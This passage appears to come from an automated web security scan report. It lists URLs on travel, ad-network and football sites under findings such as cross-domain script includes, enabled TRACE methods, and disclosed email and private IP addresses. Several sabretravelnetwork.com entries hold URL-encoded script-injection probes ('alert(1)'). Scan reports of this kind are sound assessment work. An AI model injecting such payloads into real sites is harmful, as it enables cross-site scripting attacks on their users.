19.121. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600

19.122. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=hotel§ion=wait&dest=BOS&random=042027615

19.123. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=hotel§ion=wait&random=869493130

19.124. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=342x296&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600

19.125. http://extras.expedia.com/Hotels/Delivery/HSDirect.aspx

19.126. http://fls.doubleclick.net/activityi

19.127. http://fls.doubleclick.net/activityi

19.128. http://fls.doubleclick.net/activityi

19.129. http://fls.doubleclick.net/activityi

19.130. http://fls.doubleclick.net/activityi

19.131. http://fls.doubleclick.net/activityi

19.132. http://fls.doubleclick.net/activityi

19.133. http://fls.doubleclick.net/activityi

19.134. http://fls.doubleclick.net/activityi

19.135. http://fls.doubleclick.net/activityi

19.136. http://fls.doubleclick.net/activityi

19.137. https://go.americanexpress-travel.com/hotel/HotelCobrand.do

19.138. http://googleads.g.doubleclick.net/pagead/ads

19.139. http://googleads.g.doubleclick.net/pagead/ads

19.140. http://googleads.g.doubleclick.net/pagead/ads

19.141. http://googleads.g.doubleclick.net/pagead/ads

19.142. http://googleads.g.doubleclick.net/pagead/ads

19.143. http://googleads.g.doubleclick.net/pagead/ads

19.144. http://hublotnation.com/

19.145. http://ib.adnxs.com/ab

19.146. http://ib.adnxs.com/if

19.147. http://ib.adnxs.com/if

19.148. http://ib.adnxs.com/if

19.149. http://ib.adnxs.com/seg

19.150. http://ib.adnxs.com/ttj

19.151. http://int.teracent.net/tase/int

19.152. http://o-va1.wtp101.com/imp

19.153. http://o-va1.wtp101.com/imp

19.154. http://o-va3.wtp101.com/imp

19.155. http://o-va3.wtp101.com/imp

19.156. http://oas.guardian.co.uk/RealMedia/ads/adstream_mjx.ads/www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live/oas.html/1643482332@Top,Middle2,Right1,x31,Position4

19.157. http://oas.guardian.co.uk/RealMedia/ads/adstream_mjx.ads/www.guardian.co.uk/football/manchester-united/oas.html/1603912970@Top,Right1,x31,Position4

19.158. http://optimized-by.rubiconproject.com/a/7845/12566/22557-15.html

19.159. http://optimized-by.rubiconproject.com/a/7845/12566/22557-2.html

19.160. http://optimized-by.rubiconproject.com/a/7845/12566/22557-2.html

19.161. http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html

19.162. http://searchit.sabre.com/query.html

19.163. http://seg.sharethis.com/getSegment.php

19.164. http://showadsak.pubmatic.com/AdServer/AdServerServlet

19.165. http://static.igougo.com/scripts/all_53403.ashx

19.166. http://tag.admeld.com/id

19.167. http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html

19.168. http://travel.travelocity.com/hotel/HotelAvailability.do

19.169. http://travel.travelocity.com/hotel/HotelCobrand.do

19.170. http://travel.travelocity.com/hotel/HotelDetail.do

19.171. http://travela.priceline.com/hotel/newHotelSearch.do

19.172. http://travela.priceline.com/hotel/searchHotels.do

19.173. http://travela.priceline.com/hotel/searchResults.do

19.174. http://travela.priceline.com/hotel/searchResults.do

19.175. http://www.agoda.com/pages/agoda/default/page_AdScript.aspx

19.176. http://www.aon.com/site/search.jsp

19.177. http://www.barclayswealth.com/international/foreign-exchange-affiliates.htm

19.178. http://www.barclayswealth.com/international/i-alert.htm

19.179. http://www.booking.com/general.en-us.html

19.180. http://www.booking.com/hotel/us/c-boston-massachusettes.html

19.181. http://www.booking.com/hotel/us/copley-square.en-us.html

19.182. http://www.booking.com/index.en-us.html

19.183. http://www.booking.com/searchresults.html

19.184. http://www.cheaptickets.com/shop/hotelsearch

19.185. http://www.expedia.com/Boston-Hotels-Hotel-Commonwealth.h894999.Hotel-Information

19.186. http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information

19.187. http://www.expedia.com/Hotel-Search

19.188. http://www.expedia.com/static/default/default/scripts/exp/core/ChannelTracking.js

19.189. http://www.facebook.com/plugins/likebox.php

19.190. http://www.facebook.com/plugins/likebox.php

19.191. http://www.getaroom.com/washington-dc

19.192. http://www.goal.com/en/comment/comments-box

19.193. http://www.google.com/cse

19.194. http://www.google.com/search

19.195. http://www.google.com/search

19.196. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm

19.197. http://www.hotelplanner.com/Search/Index.cfm

19.198. https://www.hotelplanner.com/Accept/Reserve.cfm

19.199. http://www.hotels.com/hotel/details.html

19.200. http://www.hotels.com/hotel/hoteldata.html

19.201. http://www.hotels.com/search.do

19.202. http://www.hotels.com/search/search.html

19.203. http://www.hotwire.com/hotel/details.jsp

19.204. http://www.hotwire.com/hotel/results.jsp

19.205. http://www.igougo.com/WebResource.axd

19.206. http://www.igougo.com/WebResource.axd

19.207. http://www.igougo.com/WebResource.axd

19.208. http://www.igougo.com/WebResource.axd

19.209. http://www.igougo.com/WebResource.axd

19.210. http://www.igougo.com/WebResource.axd

19.211. http://www.igougo.com/WebResource.axd

19.212. http://www.igougo.com/traveldeals/ratefinder.aspx

19.213. http://www.jscache.com/weimg

19.214. http://www.manutd.com/One-United/Login.aspx

19.215. http://www.manutd.com/Search-Results.aspx

19.216. http://www.manutd.com/en/Club/Sponsors.aspx

19.217. http://www.mufoundation.org/Search.aspx

19.218. http://www.nike.com/nikefootball/home/

19.219. http://www.nike.com/nikefootball/home/socialfeeds

19.220. http://www.nike.com/nikefootball/home/twitterfeed

19.221. http://www.orbitz.com/App/SubmitQuickSearch

19.222. http://www.orbitz.com/App/SubmitQuickSearch

19.223. http://www.orbitz.com/App/SubmitQuickSearch

19.224. http://www.orbitz.com/App/ViewFlightSearchResults

19.225. http://www.orbitz.com/shared/adserverProxy.jsp

19.226. http://www.orbitz.com/shared/adserverProxy.jsp

19.227. http://www.orbitz.com/shared/adserverProxy.jsp

19.228. http://www.orbitz.com/shared/adserverProxy.jsp

19.229. http://www.orbitz.com/shared/adserverProxy.jsp

19.230. http://www.orbitz.com/shared/adserverProxy.jsp

19.231. http://www.orbitz.com/shared/adserverProxy.jsp

19.232. http://www.orbitz.com/shared/adserverProxy.jsp

19.233. http://www.orbitz.com/shared/adserverProxy.jsp

19.234. http://www.orbitz.com/shared/adserverProxy.jsp

19.235. http://www.orbitz.com/shared/adserverProxy.jsp

19.236. http://www.orbitz.com/shared/adserverProxy.jsp

19.237. http://www.orbitz.com/shop/hotelsearch

19.238. http://www.orbitz.com/shop/hotelsearch

19.239. http://www.orbitz.com/shop/hotelsearch

19.240. http://www.premierleague.com/page/SearchResults/

19.241. http://www.sabrehospitality.com/

19.242. http://www.sabretravelnetwork.com/home/search/show_results

19.243. http://www.travelocity.com/popWindow2

19.244. http://www.trip.com/

19.245. http://www.trip.com/box_ad_refresh.html

19.246. http://www.tripadvisor.com/CheckMore

19.247. http://www.turkishairlines.com/en-CA/quick_search_part.aspx

19.248. http://www.turkishairlines.com/en-CA/quick_search_part.aspx

19.249. http://www.turkishairlines.com/en-CA/quick_search_part.aspx

20. Cross-domain script include

20.1. http://ad.doubleclick.net/adi/N6010.456584.XAXIS.COM/B5752701.15

20.2. http://ad.doubleclick.net/adi/N6054.Invitemedia.com/B5912738.28

20.3. http://ad.doubleclick.net/adi/N6054.Invitemedia.com/B5912738.30

20.4. http://ad.doubleclick.net/adi/gna.en/level2

20.5. http://ad.yieldmanager.com/iframe3

20.6. http://ads.pubmatic.com/HostedThirdPartyPixels/TF/ae_12232010.html

20.7. http://as.chango.com/links/adunit/1.31759988192e+12

20.8. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771877&tile=128609801075344§ion=results

20.9. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&random=656365&tile=564238840132219§ion=details

20.10. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628§ion=results

20.11. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771875&tile=128609801075344§ion=results

20.12. http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=771852&tile=128609801075344§ion=results

20.13. http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&adloc=NA&random=656361&tile=564238840132219§ion=details

20.14. http://fls.doubleclick.net/activityi

20.15. https://go.americanexpress-travel.com/hotel/HotelCobrand.do

20.16. http://googleads.g.doubleclick.net/pagead/ads

20.17. http://googleads.g.doubleclick.net/pagead/ads

20.18. http://googleads.g.doubleclick.net/pagead/ads

20.19. http://hublotnation.com/

20.20. http://hublotnation.com/

20.21. http://hublotnation.com/2011/09/23/hublot-watchesa-look-at-the-king-power-dwayne-wade/

20.22. http://ib.adnxs.com/if

20.23. http://ib.adnxs.com/if

20.24. http://ib.adnxs.com/if

20.25. http://o-va1.wtp101.com/imp

20.26. http://o-va1.wtp101.com/imp

20.27. http://o-va3.wtp101.com/imp

20.28. http://o-va3.wtp101.com/imp

20.29. http://optimized-by.rubiconproject.com/a/7845/12566/22557-15.html

20.30. http://optimized-by.rubiconproject.com/a/7845/12566/22557-2.html

20.31. http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html

20.32. http://r1-ads.ace.advertising.com/site=812162/size=160600/u=2/bnum=34930016/hr=19/hl=4/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelDetail.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253Ftab%253Dguide%2526tripType%253Dhotel%2526propertyId%253D4810%2526airport%253DBOS%2526resetReview%253Dtrue%2526hotelQKey%253D-2237575859332798600%2526tsHotelQKey%253D-2237575859332798600%2526reviewPage%253DreviewStart%2526locLink%253DHOTEL.HOTELAVAILABILITYLISTLITE1%257CNAT1%2526dr%253D4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149

20.33. http://r1-ads.ace.advertising.com/site=812162/size=160600/u=2/bnum=78334226/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526

20.34. http://r1-ads.ace.advertising.com/site=812164/size=728090/u=2/bnum=23819479/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526

20.35. http://seg.sharethis.com/getSegment.php

20.36. http://static.igougo.com/scripts/all_53403.ashx

20.37. http://static.igougo.com/traveldeals/iAuto.aspx

20.38. http://travel.travelocity.com/hotel/HotelAvailability.do

20.39. http://travel.travelocity.com/hotel/HotelCobrand.do

20.40. http://travel.travelocity.com/hotel/HotelDetail.do

20.41. http://travela.priceline.com/hotel/newHotelSearch.do

20.42. http://travela.priceline.com/hotel/searchResults.do

20.43. http://www.aon.com/manchesterunited/

20.44. http://www.booking.com/general.en-us.html

20.45. http://www.booking.com/hotel/us/c-boston-massachusettes.html

20.46. http://www.booking.com/hotel/us/copley-square.en-us.html

20.47. http://www.booking.com/index.en-us.html

20.48. http://www.booking.com/searchresults.html

20.49. http://www.cheaptickets.com/shop/hotelsearch

20.50. http://www.cmegroup.com/advance/

20.51. http://www.facebook.com/plugins/likebox.php

20.52. http://www.facebook.com/plugins/likebox.php

20.53. http://www.getaroom.com/

20.54. http://www.goal.com/en/comment/comments-box

20.55. http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run

20.56. http://www.goal.com/en/teams/england/97/man-utd-news

20.57. http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live

20.58. http://www.guardian.co.uk/football/manchester-united

20.59. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm

20.60. http://www.hotelplanner.com/Search/Index.cfm

20.61. https://www.hotelplanner.com/Accept/Reserve.cfm

20.62. http://www.hotels.com/hotel/details.html

20.63. http://www.hotels.com/search.do

20.64. http://www.hotels.com/search/search.html

20.65. http://www.hotwire.com/hotel/details.jsp

20.66. http://www.hotwire.com/hotel/results.jsp

20.67. http://www.igougo.com/WebResource.axd

20.68. http://www.igougo.com/WebResource.axd

20.69. http://www.igougo.com/WebResource.axd

20.70. http://www.igougo.com/WebResource.axd

20.71. http://www.igougo.com/WebResource.axd

20.72. http://www.igougo.com/WebResource.axd

20.73. http://www.igougo.com/WebResource.axd

20.74. http://www.igougo.com/about/

20.75. http://www.igougo.com/traveldeals/ratefinder.aspx

20.76. http://www.igougo.com/xd_receiver.aspx

20.77. http://www.manutd.com/

20.78. http://www.manutd.com/One-United/Login.aspx

20.79. http://www.manutd.com/Search-Results.aspx

20.80. http://www.manutd.com/Splash-Page.aspx

20.81. http://www.manutd.com/en.aspx

20.82. http://www.manutd.com/en/Club/Sponsors.aspx

20.83. http://www.manutd.com/en/Fanzone/Competition-And-Polls.aspx

20.84. http://www.manutd.com/en/News-And-Features/Football-News/2011/Oct/sir-alex-ferguson-proud-of-home-record-after-norwich-win.aspx

20.85. http://www.manutd.com/en/One-United.aspx

20.86. http://www.orbitz.com/

20.87. http://www.orbitz.com/

20.88. http://www.orbitz.com/App/SubmitQuickSearch

20.89. http://www.orbitz.com/App/SubmitQuickSearch

20.90. http://www.orbitz.com/App/SubmitQuickSearch

20.91. http://www.orbitz.com/App/ViewFlightSearchResults

20.92. http://www.orbitz.com/shop/hotelsearch

20.93. http://www.orbitz.com/shop/hotelsearch

20.94. http://www.premierleague.com/page/Headlines/0,,12306~2466648,00.html

20.95. http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html

20.96. http://www.premierleague.com/page/Home

20.97. http://www.premierleague.com/page/Home/0,,12306,00.html

20.98. http://www.premierleague.com/page/Players/0,,12306,00.html

20.99. http://www.premierleague.com/page/SearchResults/

20.100. http://www.sabrehospitality.com/

20.101. http://www.sabrehospitality.com/hotel-distribution-systems.php

20.102. http://www.sabretravelnetwork.com/home

20.103. http://www.sabretravelnetwork.com/home/

20.104. http://www.sabretravelnetwork.com/home/products_services/product_index/

20.105. http://www.sabretravelnetwork.com/home/products_services/product_index/images/loadingAnimation.gif

20.106. http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/

20.107. http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/images/loadingAnimation.gif

20.108. http://www.sabretravelnetwork.com/home/search/show_results

20.109. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif

20.110. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif

20.111. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif

20.112. http://www.sabretravelnetwork.com/images/home-text.png

20.113. http://www.sabretravelnetwork.com/map.html

20.114. http://www.travelocity.com/

20.115. http://www.travelocity.com/472a

20.116. http://www.travelocity.com/popWindow2

20.117. http://www.trip.com/

20.118. http://www.trip.com/box_ad_refresh.html

20.119. http://www.trip.com/hotels.html

20.120. http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html

21. TRACE method is enabled

21.1. http://bcp.crwdcntrl.net/

21.2. http://bh.contextweb.com/

21.3. http://cacheserve.williamhill.com/

21.4. http://d.tradex.openx.com/

21.5. http://event.publishflow.com/

21.6. http://m.xp1.ru4.com/

21.7. http://matcher-cwb.bidder7.mookie1.com/

21.8. http://optimized-by.rubiconproject.com/

21.9. http://r.openx.net/

21.10. http://tap.rubiconproject.com/

21.11. http://www.guardian.co.uk/

21.12. http://www.luminate.com/

22. Email addresses disclosed

22.1. http://a.cdn.intentmedia.net/javascripts/intent_media_cheaptickets_ads_fif.js

22.2. http://ads2.adbrite.com/v0/ad

22.3. http://ak-static.travel-ticker.com/static/images/1x1.jpg

22.4. http://aon.com/js/s_code.js

22.5. http://httpd.apache.org/

22.6. http://httpd.apache.org/download.cgi

22.7. http://i.travelpn.com.edgesuite.net/jquery/plug-ins/jquery.cookie.js

22.8. http://i1.goal.com/web/goal/2011092112-rev15541/js/default/news/article-merged.js

22.9. http://i1.goal.com/web/goal/2011092112-rev15541/js/default/section/team-merged.js

22.10. http://media.away.com/trip/tripjs/s_code.js

22.11. https://secure.mlb.com/shared/scripts/bam/bam.session.js

22.12. http://sorry.manutd.com/errorRedirector.html

22.13. http://static.guim.co.uk/static/32b9600ebe43926107624a816c7870f8566f154f/common/external-scripts/jquery-libraries/jquery.cookie.js

22.14. http://travela.priceline.com/zp/zpcal/src/calendar-core.js

22.15. http://travelocity.ugc.bazaarvoice.com/module/0025-en_us/sy/0025-en_us/display.pkg.js

22.16. http://w.sharethis.com/button/buttons.js

22.17. http://www.aon.com/js/s_code.js

22.18. http://www.barclayswealth.com/Scripts/swfobject_modified.js

22.19. http://www.barclayswealth.com/important-information.htm

22.20. http://www.expedia.com/static/default/default/scripts/formController.js

22.21. http://www.google.com/search

22.22. http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live

22.23. http://www.hotels.com/hotel/details.html

22.24. http://www.hotels.com/search.do

22.25. http://www.hotels.com/search/search.html

22.26. http://www.manutd.com/styles/js/jquery.jqplugin.1.0.2.min.js

22.27. http://www.nike.com/nikeos/global/js/NIKEOS.global.js

22.28. http://www.nike.com/nikeos/global/js/plugins/jquery.cookie.js

22.29. http://www.orbitz.com/shared/js/exitApp.js

22.30. http://www.sabreairlinesolutions.com/home/

22.31. http://www.sabreairlinesolutions.com/js/jquery.colorbox-min.js

22.32. http://www.sabreairlinesolutions.com/js/jquery.cookie.js

22.33. http://www.sabreairlinesolutions.com/js/jquery.equalHeights.js

22.34. http://www.sabrehospitality.com/js/modal.js

22.35. http://www.sabrehospitality.com/js/roundies.js

22.36. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif

22.37. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif

22.38. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif

22.39. http://www.sabretravelnetwork.com/images/home-text.png

22.40. http://www.sabretravelnetwork.com/js/colorbox/jquery.colorbox-min.js

22.41. http://www.sabretravelnetwork.com/js/jquery.equalHeights.js

22.42. http://www.travelocity.com/

22.43. http://www.travelocity.com/472a

22.44. http://www.turkishairlines.com/static/js/plugin/datepicker/date_en.js

22.45. http://www.turkishairlines.com/static/js/plugin/jquery-fieldselection.pack.js

22.46. http://www.turkishairlines.com/static/js/plugin/jquery.combo/jquery.combo.min.js

22.47. http://www.turkishairlines.com/static/js/plugin/jquery.cookie.js

23. Private IP addresses disclosed

23.1. http://api.connect.facebook.com/crossdomain.xml

23.2. http://api.connect.facebook.com/restserver.php

23.3. http://api.facebook.com/method/fql.query

23.4. http://api.facebook.com/restserver.php

23.5. http://connect.facebook.net/en_US/all.js

23.6. http://connect.facebook.net/rsrc.php/v1/yK/r/RIxWozDt5Qq.swf

23.7. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529178&tile=711446054649628§ion=results

23.8. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771877&tile=128609801075344§ion=results

23.9. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&random=656365&tile=564238840132219§ion=details

23.10. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628§ion=results

23.11. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771875&tile=128609801075344§ion=results

23.12. http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=529164&tile=711446054649628§ion=results

23.13. http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=771852&tile=128609801075344§ion=results

23.14. http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&adloc=NA&random=656361&tile=564238840132219§ion=details

23.15. http://dm.travelocity.com/html.ng/site=travelocity&adsize=728x90&cobrand=TRAVELOCITY&area=homepage&Section=frontdoor&tile=60048504&random=-99147040413176

23.16. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600

23.17. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=hotel§ion=wait&dest=BOS&random=042027615

23.18. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=hotel§ion=wait&random=869493130

23.19. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=342x296&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600

23.20. http://dm.travelocity.com/js.ng/site=igougo&area=other&tile=824288629634531891718497471&adsize=300x250&random=634531891718497471

23.21. http://dm.travelocity.com/js.ng/site=igougo&area=other&tile=824288629634531891718497471&adsize=728x90&pagepos=1&random=634531891718497471

23.22. http://dm.travelocity.com/js.ng/site=igougo&area=other&tile=824288629634531891718497471&adsize=728x90&pagepos=2&random=634531891718497471

23.23. http://dm.travelocity.com/js.ng/site=igougo&area=ratefinderhotel&tile=1295234161634531840155155327&adsize=728x90&pagepos=1&random=634531840155155327

23.24. http://dm.travelocity.com/js.ng/site=igougo&area=ratefinderhotel&tile=1967228532634531863146718750&adsize=728x90&pagepos=1&random=634531863146718750

23.25. http://dm.travelocity.com/js.ng/site=igougo&area=ratefinderhotel&tile=334526774634531842119167547&adsize=728x90&pagepos=1&random=634531842119167547

23.26. http://dm.travelocity.com/js.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=1x1&area=homepage&tile=990892811131760&transactionID=642711317600486&random=908927341317600

23.27. http://dm.travelocity.com/js.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=1x1&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600

23.28. http://dm.travelocity.com/js.ng/site=travelocity&cobrand=TRAVELOCITY&area=hotel&dest=BOS&adsize=sponlinks&pagepos=1&random=370629

23.29. http://dm.travelocity.com/js.ng/site=travelocity&cobrand=TRAVELOCITY&area=hotel&dest=BOS&adsize=sponlinks&pagepos=1&random=854351

23.30. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif

23.31. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif

23.32. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif

23.33. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif

23.34. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif

23.35. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif

23.36. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif

23.37. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers

23.38. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers

23.39. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers

23.40. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers

23.41. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers

23.42. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers

23.43. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf

23.44. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf

23.45. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf

23.46. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf

23.47. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/drflib.js

23.48. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/drflib.js

23.49. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/i18n/en.js

23.50. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/imgs/advertisers_US.css

23.51. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/imgs/advertisers_US.css

23.52. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/imgs/advertisers_US.png

23.53. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/imgs/advertisers_US.png

23.54. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/images/button.gif

23.55. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/images/button.gif

23.56. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/scripts/script.js

23.57. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/scripts/script.js

23.58. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/styles/style.css

23.59. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/styles/style.css

23.60. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/common/js/tvly/hotels.js

23.61. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/common/js/tvly/hotels.js

23.62. http://media.expedia.com/ads/travelhook/travelhook.js

